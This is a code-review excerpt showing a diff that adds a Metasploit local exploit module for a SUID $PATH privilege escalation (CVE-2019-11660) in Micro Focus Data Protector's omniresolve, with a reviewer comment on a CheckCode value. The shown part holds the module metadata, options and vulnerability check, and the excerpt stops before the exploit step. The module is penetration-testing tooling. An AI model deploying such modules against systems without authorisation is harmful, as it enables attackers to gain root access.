modules/exploits/linux/local/omniresolve_suid_priv_esc.rb

```diff
@@ -0,0 +1,124 @@
+
+  include Msf::Post::File
+  include Msf::Post::Linux::Priv
+  include Msf::Post::Linux::System
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Micro Focus (HPE) Data Protector SUID Privilege Escalation',
+      'Description'    => %q{
+      This module exploits the trusted $PATH environment variable of the SUID binary omniresolve.
+
+      This module has been successfully tested on:
+      HPE Data Protector A.09.07: OMNIRESOLVE, internal build 110, built on Thu Aug 11 14:52:38 2016
+      Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 118, built on Tue May 21 05:49:04 2019 on CentOS Linux release 7.6.1810 (Core)
+
+      The vulnerability has been patched in:
+      Micro Focus Data Protector A.10.40: OMNIRESOLVE, internal build 125, built on Mon Aug 19 19:22:20 2019
+      },
+      'License'        => MSF_LICENSE,
+      'Author'         =>
+        [
+          's7u55', # Discovery and Metasploit module
+        ],
+      'DisclosureDate' => '2019-09-13',
+      'Platform'       => [ 'linux' ],
+      'Arch'           => [ ARCH_X86, ARCH_X64 ],
+      'SessionTypes'   => [ 'shell', 'meterpreter' ],
+      'Targets'        =>
+        [
+          [
+            'Micro Focus (HPE) Data Protector <= 10.40 build 118',
+            upper_version: Gem::Version.new('10.40')
+          ]
+        ],
+      'DefaultOptions' =>
+        {
+          'PrependSetgid' => true,
+          'PrependSetuid' => true
+        },
+      'References'     =>
+        [
+          [ 'CVE', '2019-11660' ],
+          [ 'URL', 'https://softwaresupport.softwaregrp.com/doc/KM03525630' ]
+        ]
+    ))
+
+    register_options(
+      [
+        OptString.new('SUID_PATH', [ true, 'Path to suid executable omniresolve', '/opt/omni/lbin/omniresolve' ])
+      ])
+
+    register_advanced_options(
+      [
+        OptBool.new('ForceExploit', [ false, 'Force exploit even if the current session is root', false ]),
+        OptString.new('WritableDir', [ true, 'A directory where we can write files', '/tmp' ])
+      ])
+  end
+
+  def base_dir
+    datastore['WritableDir'].to_s
+  end
+
+  def suid_bin_path
+    datastore['SUID_PATH'].to_s
+  end
+
+  def check
+    unless setuid? suid_bin_path
+      print_error('Executable is not setuid')
+      return CheckCode::Safe
+    end
+
+    info = cmd_exec("#{suid_bin_path} -ver").to_s
+    if info =~ /(?<=\w\.)(\d\d\.\d\d)(.*)(?<=build )(\d\d\d)/
+      version = '%.2f' % $1.to_f
+      build = $3.to_i
+      unless Gem::Version.new(version) < target[:upper_version] ||
+             (Gem::Version.new(version) == target[:upper_version] && build <= 118)
+        print_error("omniresolve version #{version} build #{build} is not vulnerable")
+        return CheckCode::Safe
+      end
+    else
+      print_error("Could not parse omniresolve -ver output")
+      return CheckCode::Appears
```

Comment:
Presumably, while recent versions are currently vulnerable, once this issue is patched, reporting `CheckCode::Appears` will be less accurate over time. `CheckCode::Detected` is more appropriate.

```suggestion
      return CheckCode::Detected
```